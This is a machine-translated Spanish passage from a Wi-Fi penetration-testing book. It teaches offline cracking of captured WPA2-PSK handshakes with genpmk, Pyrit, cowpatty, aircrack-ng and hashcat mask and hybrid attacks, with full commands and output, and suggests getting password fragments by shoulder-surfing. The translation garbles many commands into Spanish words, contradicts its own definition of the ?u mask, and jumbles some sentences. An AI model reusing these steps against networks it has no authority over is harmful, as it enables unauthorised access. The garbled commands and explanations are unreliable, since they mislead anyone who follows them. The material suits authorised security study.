NS: Clave derivada generada, clave de 256 bits

DK = PBKDF2 (HMAC-SHA1, contraseña, sal, 4096, 256)

Cada clave derivada es única, lo que significa que si hay 2 puntos de acceso con diferente SSID pero la misma
frase de contraseña, el PMK será completamente diferente.

¿Qué es PMK?
Clave maestra por pares, una clave de 256 bits derivada de la función PBKDF2 que
utiliza el SSID, la frase de contraseña (PSK) y el algoritmo hash HMAC-SHA1. Este es el factor diferenciador
utilizado para la autenticación entre el AP y el Cliente. Se verá así:

Llave maestra : 1F 4B 02 FE 4C 82 F4 E0 26 2E 60 97 E7 BA D1 F1
92 83 B6 68 7F 08 4F 73 33 1D B8 6C 62 49 8B 40

Clave transitoria: D9 E6 11 68 BC F0 0D DF 75 BB 36 ED 38 F2 8A 22
BA DA 5F 97 CF 2E 6F B1 49 3A 53 2B 45 78 7C 0C
56 C8 CE D5 BD 64 99 04 E7 0C 1A 7C 2C D7 87 C4
D5 90 50 E6 ED 40 60 94 BB C9 06 AA 55 35 FF 88

EAPOL HMAC : 99 92 11 87 16 7C 8D F2 D1 F9 9B 8E DF 6F 4D 86

Haz los cálculos, 32 valores hexadecimales, 1 hexadecimal = 8 bits, 32*8

= 256 bits, que es la clave PMK, es decir, de 256 bits

También podemos verificar esto sin descifrar la clave con aircrack-ng.

Usando el comando wpa_passphrase que viene preinstalado en casi todas las distribuciones *nix.

Sintaxis: wpa_passphrase [SSID] [Frase de contraseña]

wpa_contraseña rooth3ll iamrootsh3ll

75
Machine Translated by Google

Necesitamos insertar el SSID junto con la Frase de contraseña porque, como se dijo anteriormente , WPA2-PSK depende

del SSID, cambia completamente con un ligero cambio en el SSID. Ahora,

wpa_contraseña rooth3ll iamrootsh3ll > [Link]

Muestra el contenido de [Link]:

gato [Link]
red={
ssid="rootsh3ll"
#psk="iamrootsh3ll"
psk=1f4b02fe4c82f4e0262e6097e7bad1f19283b6687f084f73331db86c62498b40
}

Compare el valor resaltado con la clave maestra anterior:

Es exactamente lo mismo. Lo que confirma que el PMK calculado manualmente y el PMK calculado por aircrack-ng para un

SSID y frase de contraseña específicos es el mismo.

Ahora veremos cómo aumentar la velocidad.

¿Qué es CoWPAtty?
cowpatty es una herramienta de línea de comandos gratuita que automatiza el ataque de diccionario para WPA-PSK. Se

ejecuta en Linux. Es una implementación de un ataque de diccionario fuera de línea contra redes WPA/WPA2 usando
autenticación basada en PSK. cowpatty toma 2 tipos de entrada para descifrar WPA-PSK:
1. Lista de palabras estándar

2. Hash o PMK pregenerados

cowpatty viene preinstalado en Kali Linux y está disponible para descargar desde

[Link]

¿Qué es Pirita?
Pyrit es una herramienta escrita en Python que le permite crear bases de datos masivas, calcular previamente el WPA2-PSK

para ahorrar tiempo. La técnica se llama intercambio de espacio-tiempo. Pyrit es compatible con CPU y GPU. para usar

GPU, debe instalar un controlador de gráficos compatible.

Pyrit viene preinstalado en Kali Linux. Pyrit se puede descargar desde [Link]

JPaulMora/Pyrit

¿Qué es el intercambio espacio-tiempo?

Si recuerda, en uno de los capítulos anteriores desciframos la frase de contraseña WPA2 usando aircrack-ng pasándole

una lista de palabras, que supuestamente contenía la frase de contraseña real.

Lo cual no es probable que sea posible, ya que la lista de palabras no tiene límite. La frase de contraseña puede estar en

cualquier diccionario que hayamos elegido o incluso puede estar ausente en el diccionario. Nosotros, como probadores de
penetración, simplemente no lo sabemos y también la velocidad de craqueo para WPA2-PSK es muy baja, por lo que necesitamos

76
Machine Translated by Google

para acelerar el proceso de alguna manera. Aquí es donde entra en escena el intercambio de espacio-tiempo.

Lo que realmente hacemos es calcular previamente la PMK (clave maestra por pares) con el SSID correspondiente y almacenarla

en un disco duro y podemos usarla en cualquier momento con el archivo Cap para el mismo SSID, ya que WPA2-PSK es SSID y

Sensible a la contraseña. Como hemos calculado previamente los PMK y los hemos almacenado en nuestro disco duro, es como una

búsqueda del sistema en la tabla que no

toma mucho tiempo y la velocidad de craqueo es muy alta, ahorrándonos mucho tiempo.

La única condición es que debe haber un archivo precomputado con el mismo SSID y diferentes frases de contraseña

seleccionadas de una lista de palabras. Aunque incluso esto no garantiza descifrar la PSK, la velocidad de descifrado es

significativamente mayor que la de cualquier CPU o GPU, eso lo veremos en este tutorial.

Instalacion y configuracion

Instalación de CoWPAtty desde el código fuente

Ejecutar en la Terminal:
cd ~/Desktop
wget [Link] #Descargar fuente
tar zxfv [Link] #Extraer archivo Gunzip
cd cowpatty-4.6/ #Cambiar directorio
hacer #Compilar código fuente
sudo cp cowpatty /usr/bin #Copiar cowpatty binario

Instalación de Pyrit desde el código fuente

Ejecutar en la Terminal:
wget [Link] tar xvzf #Descargar código fuente
[Link] cd pyrit-0.4.0 python [Link] build sudo python [Link] #Extraer archivo Gunzip
install #Mover al directorio extraído
#Configuración de compilación

#Instalar pirita

77
Machine Translated by Google

Generar PMK usando GenPMK

genpmk es una herramienta que se instala junto con cowpatty como sustituto para generar el archivo hash (PMK) y
permitir que cowpatty descifre WPA2-PSK a velocidades más altas.
Veamos cómo crear PMK usando genpmk.

Ejecutar en la Terminal:

Sintaxis: genpmk -f [lista de palabras] -d [nombre de archivo de salida] -s [SSID]

genpmk -f "[Link]" -d "GENPMK_rootsh3ll" -s "rootsh3ll"

genpmk 1.1 - Ataque de precálculo WPA-PSK. <jwright@[Link]> El archivo
GENPMK_rootsh3ll no existe, creando. número de clave 1000: bolos 1 clave no. 2000:
princesa15 clave no. 3000: clave infiel no. 4000: llave andresteamo no. 5000: clave hennessy
no. 6000: amigasporsiempre clave no. 7000: 0123654789 clave no. 8000: clave trinitron no.
9000: flor22 clave no. 10000: clave vincenzo no. 11000: clave pensacola no. 12000: llave
boyracer núm. 13000: llave de la abuela no. 14000: campo de batalla

GENPMK_rootsh3ll no existía, por lo que genpmk creó un nuevo archivo. En caso de que el archivo ya exista, los valores
hash se agregan al archivo existente.

Ahora espere a que genpmk termine de generar PMK. Y le mostrará la velocidad promedio (frases de contraseña/seg)
a la que generó PMK. el mio fue

20000 frases de contraseña probadas en 54,94 segundos: 363,99 frases de contraseña/segundo

Como ya he dicho, GenPMK es un programa de un solo subproceso. Aquí puede ver que mientras se ejecutaba GenPMK,
solo se usó un núcleo al 100%

Ahora pasemos a Crear PMK usando Pyrit.

78
Machine Translated by Google

Generar PMK usando Pyrit

Ejecutar en la Terminal:

Sintaxis: pyrit -o [Output_filename] -i [Lista de palabras] -e [SSID] passthrough

pyrit -o "PYRIT_rootsh3ll" -i "[Link]" -e paso "rootsh3ll"

Pirita 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora

[Link]
Este código se distribuye bajo la Licencia Pública General GNU v3+

Computó 1000000 PMK en total; 2089 PMK por segundo

Si observa, las opciones requeridas siguen siendo las mismas, solo hemos cambiado el nombre del archivo de salida con un prefijo

"PYRIT" para distinguir los PMK generados con Pyrit y GenPMK.

passthrough es una opción en pyrit que se usa para crear los PMK a partir de la frase de contraseña tomada del diccionario en un

momento. La velocidad es comparativamente alta desde GenPMK. Observe y compare la velocidad en la salida anterior

¿Ver la diferencia?

363,99 frente a 2089.

¿por qué?

Debido a que GenPMK es un programa de un solo subproceso, mientras que Pyrit es una herramienta que utiliza toda la potencia de

la CPU, es decir, 4, 8 o incluso 16 núcleos, Pyrit obtendrá la máxima potencia. Que es lo que hace que sea una mejor opción para

elegir generar PMK sobre GenPMK.

Vea el uso de la CPU mientras Pyrit generaba PMK:

Ahora comencemos a descifrar PSK.

79
Machine Translated by Google

Crackear WPA2-PSK [CoWPAtty vs.

Aircrack-ng]
Sería mejor si primero verificamos la velocidad de craqueo de aircrack-ng en este sistema y luego notamos un aumento en la

velocidad usando CoWPAtty.

Crackear WPA2-PSK con Aircrack-ng

Requisitos:

• Apretón de manos EAPoL de 4 vías (archivo pcap)

• Lista de palabras (longitud de 8 a 63 caracteres)

En este ejemplo, mantuve la contraseña real al final del archivo y verifiqué la velocidad máxima que alcanzó aircrack-ng

mientras descifraba el PSK.

Vaya a Escritorio, donde se encuentran el archivo Pcap y las listas de palabras. Abrir terminal y simplemente escribir

Sintaxis: aircrack-ng -w [lista de palabras] <archivo Pcap>

aircrack-ng -w [Link] [Link]

Aircrack-ng 1.2 rc4

[Link] 84108/9822765 claves probadas (1708.09 k/s)

Tiempo restante: 3 horas, 58 minutos, 27 segundos 0,37%

¡LLAVE ENCONTRADA! [ soyrootsh3ll ]

Llave maestra : 1F 4B 02 FE 4C 82 F4 E0 26 2E 60 97 E7 BA D1 F1
92 83 B6 68 7F 08 4F 73 33 1D B8 6C 62 49 8B 40

Clave transitoria: D9 E6 11 68 BC F0 0D DF 75 BB 36 ED 38 F2 8A 22
BA DA 5F 97 CF 2E 6F B1 49 3A 53 2B 45 78 7C 0C
56 C8 CE D5 BD 64 99 04 E7 0C 1A 7C 2C D7 87 C4
D5 90 50 E6 ED 40 60 94 BB C9 06 AA 55 35 FF 88

EAPOL HMAC : 99 92 11 87 16 7C 8D F2 D1 F9 9B 8E DF 6F 4D 86

Fíjate en la velocidad:

1708,09 teclas/ seg, eso es lo que aircrack-ng alcanzó al máximo en mi sistema (i5, 2,5 GHz).

Usemos los PMK precalculados con CoWPAtty y veamos la diferencia de velocidad

No hay GPU involucrada en la generación de PMK o en el descifrado de claves en ningún paso.

80
Machine Translated by Google

Ejecutar en la Terminal:

Sintaxis: cowpatty -d [archivo hash] -r [archivo Pcap] -s [SSID]

empanada de vaca -d PYRIT_rootsh3ll -r [Link] -s rootsh3ll

cowpatty 4.6 - Ataque de diccionario WPA-PSK. <jwright@[Link]>

Recopiló todos los datos necesarios para montar crack contra la frase de contraseña WPA2/PSK.
Comenzando ataque de diccionario. Por favor sea paciente.
número de clave 10000: vicenzo
número de clave 20000: 13031991
clave nº 30000: nejihyuga

El PSK es "iamrootsh3ll".

36120 frases de contraseña probadas en 0,20 segundos: 182297,19 frases de contraseña/segundo

También puede usar GENPMK_rootsh3ll, ambos son iguales. Estoy usando PYRIT_rootsh3ll porque contiene
más frases de contraseña (PMK) debido a la mayor velocidad de cálculo de Pyrit.

¿Ver la diferencia?

mismo sistema, misma RAM, sin GPU incluida y casi un 12,676 % de aumento en la velocidad.
Aircrack: 1708 frases de contraseña/segundo
Cowpatty con PMK pregenerado: 182297.19 frases de contraseña/segundo

Esto ha sido posible solo porque teníamos claves precalculadas y lo que tuvo que hacer cowpatty fue simplemente
hacer un bucle en el archivo hash, sin cálculos involucrados.

Una contraseña necesita 4096 iteraciones de CPU para salir con el PSK de 256 bits. Imagine una lista de
palabras que contenga 1 millón de frases de contraseña. ¿Cuántos ciclos de CPU se necesitarán para que esa lista
de palabras procese y genere los PMK? 4,096,000,000 eso es 4 mil millones de iteraciones para 1 millón de
palabras. Incluso 1 millón de palabras no son nada, los tamaños de diccionario van mucho más allá de Gigabytes o
Terabytes.
Esta es la razón por la que obtenemos velocidades de craqueo más bajas en comparación con el craqueo MD5, SHA1 Hash.

[¡EXTRA!] Pyrit + CoWPAtty Stdin

Ahora, hemos aprendido a crear PMK por separado y usarlos con cowpatty para aumentar las velocidades de
craqueo. Aquí hay un método, que no mejora la velocidad en comparación con aircrack-ng, pero es muy
interesante para aprender y ver el funcionamiento de los comandos y la terminal, ya que esta serie es para
principiantes, vale la pena.
Aquí lo que vamos a hacer es
1. Pase un diccionario (longitud de 8-63 caracteres) a pyrit y dígale que genere los PMK.
2. No escriba el resultado en un archivo, sino páselo a CoWPAtty.
3. cowpatty recibirá PMK como stdin (entrada estándar) y
4. Comienza el agrietamiento

81
Machine Translated by Google

Puede ver esto como una versión sofisticada de craqueo con aircrack-ng, ya que en aircrack-ng simplemente pasamos el
archivo cap y el diccionario. Esto será bastante largo y profundo en términos de comprensión.

Vamos a empezar

Ejecutar en la Terminal:

pyrit -i [Link] -e rootsh3ll -o - passthrough | vaca -d - -r raí[Link] -s raícesh3ll

Sí, esto puede parecer muy confuso si eres un principiante en el mundo de Linux. Necesitas entender el comando.
Vamos a dividirlo para que sea simple y fácil de entender.
'|': Operador de canalización
Es un operador de shell de Linux que se usa para pasar la salida de un comando a otro (hacia el lado derecho), es decir,
después del operador.
Lo que hicimos fue pasar la salida del comando pyrit a cowpatty en tiempo real y
cowpatty se está ejecutando al mismo tiempo y está tratando de descifrar la frase de contraseña.

Si observa, verá que Before y After Pipeline son los mismos comandos que usamos anteriormente con solo una diferencia.

No usamos ningún nombre de archivo de salida con Pyrit (PYRIT_rootsh3ll anteriormente), ni tampoco un archivo de entrada
para cowpatty con la opción -d que es para el archivo hash (consulte el menú de ayuda de cowpatty -h ).

¿Entonces, qué hicimos?

Usamos otra característica de Linux Shell para almacenar la entrada en STDIN (STanDard INput) y recibirla al mismo tiempo
desde STDIN. Esto se hace usando el operador '-'. Este operador funciona como STDINsalida
cuandohacia/desde
tenemos que
un archivo.
dirigir alguna
es
decir, escribir en un archivo Hash con pyrit y recibir información del archivo Hash con CoWPAtty.

Entonces, si nota que reemplazamos ambos nombres de archivo con '-', eso simplemente significa que Pyrit escribirá los
PMK calculados en la entrada estándar y la salida se pasará usando '|' operador al comando cowpatty . Ahora, en el mismo
momento en que cowpatty comienza a recibir
la entrada del STDIN, como se le indicó a la opción '-d', CoWPAtty tomará los PMK calculados del STDIN y comenzará
a descifrar el PSK. Si PMK coincidió, se encontrará la frase de contraseña; de lo contrario, pruebe con otros diccionarios
y continúe.

Así es como se verá cuando se ejecute:

cowpatty 4.6 - Ataque de diccionario WPA-PSK. <jwright@[Link]>

Recopiló todos los datos necesarios para montar crack contra la frase de contraseña WPA2/PSK.
Comenzando ataque de diccionario. Por favor sea paciente.
Uso de STDIN para contenido de archivos hash.

número de clave 10000: vicenzo

número de clave 20000: 13031991
clave nº 30000: nejihyuga

El PSK es "iamrootsh3ll".

36120 frases de contraseña probadas en 62,48 segundos: 578,09 frases de contraseña/segundo

82
Machine Translated by Google

La velocidad es casi similar a la que estaba calculando aircrack-ng porque los PMK se
calculan en tiempo real y se pasan a cowpatty. ¡La CPU se está consumiendo!
Espero que tengas una mejor idea de lo que sucede mientras descifras y aceleras todo
proceso.
Hay una cosa que me gustaría que echaras un vistazo: Airolib-ng para acelerar el Cracking
proceso

Investigue y pruebe un poco y hágamelo saber (harry@[Link]) ¿Cuáles fueron sus

resultados en velocidad o qué problemas enfrentó durante el tutorial anterior o Airolib-ng.
También puede publicar [Link], el foro de soporte para este libro
Hay muchas más cosas interesantes en los próximos capítulos.

83
Machine Translated by Google

Uso de herramientas basadas en GPU

Aircrack y cowpatty utilizan la CPU como método principal para calcular los PMK. Seguro que nos da
un impulso, pero al usar PMK, en realidad no estamos aprovechando ningún poder de procesamiento.

Esto nos lleva a algunos inconvenientes del uso de PMK, como sigue:

• Específico de SSID: no puede usar PMK generados para SSID, diga "rootsh3ll" para otro SSID como "Belkin". Ni
siquiera "rootsh3ll".

• Se distingue entre mayúsculas y minúsculas : no se puede utilizar si se alteran las mayúsculas y minúsculas de los caracteres. Ej: no funcionará para

"Rootsh3ll" si se crean PMK para "rootsh3ll".

• El tiempo utilizado es el mismo: como la potencia de procesamiento de la CPU es la misma en ambos casos, el
tiempo necesario para crear PMK es el mismo incluso si utiliza Aircrack o crea PMK (con GenPMK).

• Se requiere un gran espacio en HD : el almacenamiento de PMK en HD requiere mucho espacio en su HD y eso

también para un SSID específico. Lo cual no es una opción viable por lo general.

• Menos útil en el mundo real: hoy en día, los enrutadores se envían con un SSID único.
Ej: Belkin_04A2 para evitar que los enrutadores sufran este tipo de ataques o al menos retrasar la duración del
craqueo.

Podría estar pensando ahora que si esto es así, ¿por qué consideraría los PMK para descifrar?

Bueno, como dije anteriormente, esto es menos útil, eso significa que en algunos casos.
Casos como:

• SSID simples. Ej: MTNL, Airtel, Linksys, etc.

• Antes de intentar cualquier tarea compleja para descifrar el PSK, si ya tiene almacenados PMK.
darles una oportunidad

• Los números de móvil son contraseñas muy comunes.

Aún así, incluso si esto proporciona velocidad, este método es un poco lento. No siempre tienes un amigo listo para
darte un PMK específico de SSID generado previamente justo cuando has capturado el apretón de manos, ¿verdad? si,
es muy raro!

Aquí es cuando necesita mantener la CPU (para descifrar) a un lado y encender la GPU al máximo
energía.
Si no está al tanto del uso de GPU para descifrar, déjeme decirle, las GPU se usan para descifrar hashes de contraseña y
se están usando ahora por un tiempo.
Hay muchas herramientas que usan GPU y le ahorran mucho tiempo por el costo de unos pocos dólares que pagará
usando la electricidad utilizada por los núcleos de GPU. Pero, está bien, puedes ganar dinero de nuevo, ¡no tiempo!

84
Machine Translated by Google

Herramientas como:

hachís _

• pirita
• BarrasWF

• igHashGPU

¿Cómo? ¡Sencillo! Su CPU tiene 2,4,8 núcleos, lo que significa unidades de computación paralelas donde las GPU las
tienen en miles, si no cientos.

Mi GeForce GT 525M tiene 296 núcleos y es una tarjeta gráfica bastante desactualizada.
Velocidad: ~6000 PMK/ s. NVidia Titán X es la mejor tarjeta gráfica individual con una velocidad de craqueo de hasta
2ÿ096ÿ000 hash/seg.

Uso de GPU para descifrar contraseñas WPA/2

Las herramientas descritas anteriormente se utilizan para descifrar varios tipos de contraseñas.
Hay 2 herramientas utilizadas para descifrar WPA/2-PSK usando GPU de la lista anterior

• Pirita
• HashCat

Hashcat, que es la herramienta más rápida y versátil, junto con un desarrollo activo, será nuestra herramienta de
referencia para este capítulo.

¿Qué es Hashcat?
Ocl/CUDA Hashcat ahora es de código abierto. Pago en GitHub: [Link]
Hashcat es un descifrador de contraseñas más rápido del mundo basado en la línea de comandos autoproclamado.
Es el primer y único motor de reglas basado en GPGPU del mundo y está disponible para Linux, OSX y Windows sin
costo alguno. Viene en 2 variantes

• Basado en CPU
• Basado en GPU

No hay diferencia al pasar comandos a Hashcat porque utiliza automáticamente el mejor método para descifrar contraseñas,
ya sea CPU o GPU, según el controlador de gráficos que haya instalado.

Hashcat es rápido y extremadamente flexible. Incluso permite el agrietamiento distribuido. Recomiendo

encarecidamente Hashcat sobre Pyrit por su flexibilidad.

¿Por qué usar Hashcat en primer lugar?

Como se describe, debido a su flexibilidad y amplio soporte de algoritmos.
Pero, ¿por qué Hashcat cuando solo quiero descifrar WPA/2 la mayoría de las veces?
Si todavía no has usado Pyrit, déjame decirte una cosa. Pyrit fue el cracker WPA/2 más rápido disponible en sus
primeros días, pero usa diccionario o lista de palabras para descifrar las contraseñas, incluso si usa PMK o ejecuta
directamente el cracker, necesita tener una gran cantidad de diccionarios para probar la validez del hash.

85
Machine Translated by Google

Además, Hashcat ha estado superando a Pyrit durante muchos años. y si todavía está usando Pyrit, ¡ahora es el momento de

cambiar a Hashcat!

Para almacenar hashes, necesita mucho espacio en disco. Como puede ver en la imagen a continuación, hay algunas listas de

palabras que casi ocupan más de 25 GB en el disco (Extraídas), y lleva más de 2 o 3 días ejecutarlas todas, incluso con GPU.

Puede descargar algunas listas de palabras útiles aquí.

Pero, la mayoría de las veces, hay algún patrón (contraseñas predeterminadas) que nos gusta probar para verificar su

validez. Patrones como:

• Número de móvil

• Fecha de nacimiento

• Patrones de contraseña predeterminados como "56324FHe"

• Contraseña predeterminada de 10 dígitos por ISP

• y así sucesivamente

Aquí es cuando tenemos que dejar Pyrit con sus diccionarios y ponte manos a la obra con Hashcat.

Hashcat tiene una característica brillante llamada ataque de máscara, que nos permite crear patrones definidos por el usuario

para probar la validez de la contraseña y ¿sabes qué es lo mejor? Requiere 0 Bytes en su disco duro.

¿Cómo?

Primero debe comprender que, en algunos casos, necesitamos listas de palabras. Solo cuando estamos muy seguros de que

tiene algún tipo de patrón, podemos usar este tipo de ataque. Entonces, si sabe que cierto ISP tiene números aleatorios de 10

dígitos y solo unas pocas letras, puede hacerlo para ahorrar espacio en su HD.

El descifrado de WPA/2 es una tarea tediosa y utiliza la máxima potencia del sistema cuando usamos Hashcat y, a veces,

necesita eliminar la carga del sistema para cambiar de tarea.

Hashcat se destaca mejor aquí por su característica notable.

• Admite pausar/reanudar mientras se descifra

• Admite sesiones y restauración

86
Machine Translated by Google

Profundizaremos en estas características. Sigue leyendo.

Tipos de ataques admitidos

• Ataque basado en diccionario

• Ataque de máscara/fuerza bruta

• dictado híbrido + máscara

• Máscara híbrida + dict

• Ataque de permutación

• Ataque basado en reglas

• Ataque de cambio de caso

Estos son por nombrar algunos. Hashcat admite demasiados algoritmos para descifrar su hash.

NOTA: el ataque de fuerza bruta tradicional está desactualizado y se reemplaza por el ataque de máscara en Hashcat.
Veremos más adelante en este post en detalles sobre esto.

Configuración del laboratorio

Instalación del controlador de gráficos

Tienes básicamente 2 opciones

1. Instale el controlador de gráficos en Kali Linux directamente, es decir, su distribución Pentesting.
2. Instale el controlador de gráficos en Windows u OSX.

El sistema operativo instalado en una máquina virtual no tiene acceso a la tarjeta gráfica ni a la aceleración de la GPU.
Entonces, me quedaré con Hashcat en Windows (máquina host). Todavía puede hacer la misma tarea con exactamente
los mismos comandos en Kali Linux (o cualquier sistema operativo Linux) u OSX con controladores propietarios instalados
correctamente.

Descargar hashcat

Descarga Hashcat desde el sitio web oficial: [Link]

El archivo binario está altamente comprimido con compresión 7z. Por lo tanto, asegúrese de tener al menos 1 GB antes de
extraer el archivo descargado.
Puede usar el extractor 7zip para descomprimir el archivo .7z. Descárgalo aquí: [Link]
[Link]/[Link]

PD: Es gratis y mejor que WinRAR.

Compatibilidad de archivos pcap con Hashcat

Hashcat no admite el archivo Pcap original de inmediato.

Debe convertir el archivo Pcap a un formato que Hashcat entienda.
Antes de convertir, limpie el archivo en busca de protocolos de enlace válidos usando wpaclean para reducir la salida

87
Machine Translated by Google

tamaño del archivo.

Convierta sus archivos Pcap manualmente en Kali Linux, use el siguiente comando
Sintaxis: wpaclean <[Link]> <[Link]>
wpaclean raícesh3ll_hashcat.cap raí[Link]

Tenga en cuenta que las opciones de wpaclean están al revés. <[Link]> <[Link]> en lugar de <[Link]>
<[Link]> lo que puede causar cierta confusión.

Convertir archivo .cap a archivo <.hccap>

Ahora suponiendo que ha instalado el controlador de gráficos apropiado para el sistema operativo
seleccionado, continúe con el siguiente paso. Necesitamos convertir el apretón de manos capturado previamente, es decir
pcap en un formato que Hashcat pueda entender y es el formato de archivo .hccap.
Nada difícil o toma tiempo. El comando para convertir .cap a .hccap es así:

Sintaxis: aircrack-ng -J <[Link]> <ruta/al/archivo .cap>

Aquí [Link] es el nombre del archivo de salida con formato de archivo .hccap y [Link] es el
protocolo de enlace capturado originalmente.
Inicie sesión en Kali Linux y escriba en Terminal:
aircrack-ng -J “[Link]” “[Link]”

[Link] se encuentra en el escritorio. Verifique la ubicación de su archivo Pcap.

Ahora tenemos un archivo hccap , un controlador de gráficos instalado y Hashcat descargado. Comencemos el
agrietamiento.

Crackear contraseñas WPA/2 usando Hashcat

Cubriremos los siguientes temas:
• Cracking WPA/2 con ataque de diccionario usando Hashcat.
• Cracking WPA/2 con ataque Mask usando Hashcat.
• Cracking WPA/2 con ataque Híbrido usando Hashcat.
• Pausa/reanudación de craqueo WPA/2 en Hashcat (una de las mejores características)
• WPA/2 Cracking guardar sesiones y restaurar.

Abra CMD en el directorio Hashcat, copie el archivo hccap y las listas de palabras y ejecute:
[Link] -m 2500 [Link] [Link] [Link]

Aquí tengo la tarjeta gráfica de NVidia, así que uso el comando Hashcat seguido de 64, ya que estoy usando la
versión de Windows 10 de 64 bits. el tuyo dependerá de la tarjeta gráfica que estés usando y de la versión de
Windows (32/64).
Desglose de comandos:
[Link]: el programa, en la misma carpeta hay un [Link] para SO de 32 bits y
[Link] / [Link] para Linux.
-m 2500: El tipo de hash específico. 2500 significa WPA/WPA2.

88
Machine Translated by Google

En caso de que olvide el código WPA2 para Hashcat.

CMD de Windows: [Link] --ayuda | encontrar "WPA"
Terminal de Linux: [Link] --ayuda | grep "WPA"

Le mostrará la línea que contiene "WPA" y el código correspondiente.

[Link]: archivo *.cap convertido.
[Link] [Link]: Las listas de palabras, puede agregar tantas listas de palabras como desee.

Para simplificarlo un poco, cada lista de palabras que haga debe guardarse en la carpeta Hashcat.
Después de ejecutar el comando, debería ver un resultado similar:

Espere a que Hashcat termine la tarea. Puede pasar varias listas de palabras a la vez para que Hashcat siga probando
la siguiente lista de palabras hasta que coincida la contraseña.

Ataque de máscara WPA/2 usando Hashcat

Como se dijo anteriormente, el ataque Mask es un reemplazo del ataque tradicional de fuerza bruta en Hashcat para
obtener resultados mejores y más rápidos.

echemos un vistazo a lo que realmente es Mask Attack.

En Terminal/tipo cmd:

• [Link] -m 2500 <[Link]> -a 3 ?d?l?u?d?d?d?u?d?s?a

• -a 3 es el modo de ataque, conjunto de caracteres personalizados (ataque de máscara)

• ?d?l?u?d?d?d?u?d?s?a es el conjunto de caracteres que le pasamos a Hashcat. entendamos

en un poco de detalle que

• ¿Qué es un juego de caracteres en Hashcat?

• ¿Por qué es útil?

89
Machine Translated by Google

¿Qué es un conjunto de caracteres en Hashcat?

?d ?l ?u ?d ?d ?d ?u ?d ?s ?a : Clave WPA de 10 letras y dígitos de longitud. Puede tener entre 8 y 63 caracteres de largo.

La cadena de texto anterior se llama "Máscara". Cada par que usamos en los ejemplos anteriores se traducirá en el carácter
correspondiente que puede ser un carácter alfabético/dígito/especial.
Para recordar, solo vea el carácter utilizado para describir el juego de caracteres.
?d: para dígitos
?s: Para caracteres especiales
?en: Para alfabetos en mayúsculas
?l: Para alfabetos en minúsculas
?un: Todo lo anterior.

¡Sencillo! ¿no es así?

Aquí está el conjunto de caracteres real que indica exactamente qué caracteres están incluidos en la lista:

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789

?s = «espacio»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s

Aquí hay algunos ejemplos de cómo se vería el PSK cuando se pasa una máscara específica.
Máscara = ?d?l?u?d?d?d?u?d?s?a

0aC575G2/@
9zG432H0*K
8sA111W1 $ 4
3wD001Q5 + z

Entonces ahora deberías tener una buena comprensión del ataque de la máscara, ¿verdad?

Profundicemos un poco más ahora.

Ataque de máscara mixta con personajes personalizados.

Suponga que de alguna manera llega a conocer una parte de la contraseña. Sería mejor si ponemos esa parte en el ataque

y aleatorizamos la parte restante en Hashcat, ¿no?

¡Por supuesto! Es muy simple. Simplemente coloque los personajes deseados en el lugar y descanse con la máscara.

He ?d ?l 123 ?d ?d ?u ?d C es el ataque de máscara personalizado que hemos usado. Aquí asumiendo que tu

90
Machine Translated by Google

Conozca los primeros 2 caracteres de la contraseña original y luego configure el segundo y tercer carácter como dígito y letra
minúscula seguido de 123, luego ?d ?d ?u ?d y finalmente termine con C como ya sabía.

Lo que realmente hicimos es que simplemente colocamos los caracteres en la posición exacta que conocíamos y
enmascaramos los caracteres desconocidos, por lo tanto, dejamos que Hashcat realice más pruebas.

Aquí hay un ejemplo más para lo mismo:

Digamos que la contraseña es Hi123World y solo sabe la parte "Hi123" de la contraseña a través de la navegación por el
hombro / escuchar / escuchar a escondidas lo que sea. El resto son letras minúsculas.
Suponiendo que la longitud de la contraseña sea 10.

Sintaxis: [Link] -m 2500 [[Link]] -a 3 Hi123?u?u?u?u?u

Donde ?u será reemplazado por letras minúsculas, una por una hasta que la contraseña coincida o se agoten las
posibilidades.
Avanzando aún más con el ataque de máscara, es decir

Ataque híbrido.
En el ataque híbrido, lo que realmente hacemos es no pasar ninguna cadena específica a Hashcat manualmente,
sino automatizarla pasando una lista de palabras a Hashcat.
Hashcat recoge las palabras una por una y las prueba con todas las contraseñas posibles según la Máscara definida.

[Link] -m 2500 apretón de [Link] -a 1 contraseñ[Link] ?d?l?d?l

Desglose de comandos:
-un 6: El ataque híbrido
contraseñ[Link] ? Lista de palabras

d?l?d?l Máscara (4 letras y números)

La lista de palabras contiene 4 palabras.

1. Carlos

2. pie grande
3. invitado
4. cebolla

Ahora usará las palabras y las combinará con la Máscara definida y la salida debería ser esta:

carlos2e1c
pie grande0h1d
invitado5p4a
cebolla1ÿ1ÿ

Es genial que incluso puedas invertir el orden de la máscara, significa que simplemente puedes poner el
máscara antes del archivo de texto. Hashcat aplicará fuerza bruta a las contraseñas de esta manera:

91
Machine Translated by Google

7a2ecarlos
8j3pie grande
0t3wguest
6a5joonion

Estás captando la idea ahora, ¿verdad?

Usar tantos diccionarios a la vez, usar máscaras largas o máscaras híbridas+lleva mucho tiempo para completar
la tarea. No es posible para todos mantener el sistema encendido y no usarlo para el trabajo personal y los
desarrolladores de Hashcat entienden muy bien este problema.
Entonces, se les ocurrió una solución brillante que ninguna otra herramienta de recuperación de contraseñas
ofrece integrada en este momento. Esa es la función Pausa/Reanudar

Pausa/reanudación de craqueo WPA/2 en Hashcat (una de las mejores características)

Esta función se puede usar en cualquier lugar de Hashcat. No se limita solo al cracking WPA/2. Incluso si está
descifrando md5, SHA1, OSX, hashes de WordPress. Tan pronto como el proceso esté en ejecución, puede pausar/
reanudar el proceso en cualquier momento.
Simplemente presione [p] para pausar la ejecución y continuar con su trabajo.

Para reanudar presione [r]. Todos los comandos están justo al final de la salida durante la ejecución de
la tarea. Ver imagen a continuación

A veces, puede sentir esta característica como una limitación, ya que todavía tiene que mantener el sistema
despierto, para que el proceso no se borre de la memoria.
Y también tenemos una solución para eso. ¡Crea sesión!

WPA/2 Cracking guardar sesiones y restaurar.

Crear y restaurar sesiones con hashcat es extremadamente fácil.
Solo ass –session al final del comando que desea ejecutar seguido del nombre de la sesión.
Ejemplo:

[Link] -m 2500 [Link] -a 3 Hola?d?l?d?u123?l?l?u --session=blabla

Aquí nombré la sesión blabla. Puede ver en la imagen a continuación que Hashcat ha guardado la sesión con el
mismo nombre, es decir, blabla y en ejecución.

92
Machine Translated by Google

Ahora puede simplemente presionar [q] cerrar cmd, apagar el sistema, volver de vacaciones, encender
el sistema y reanudar la sesión. ¡Así de fácil!

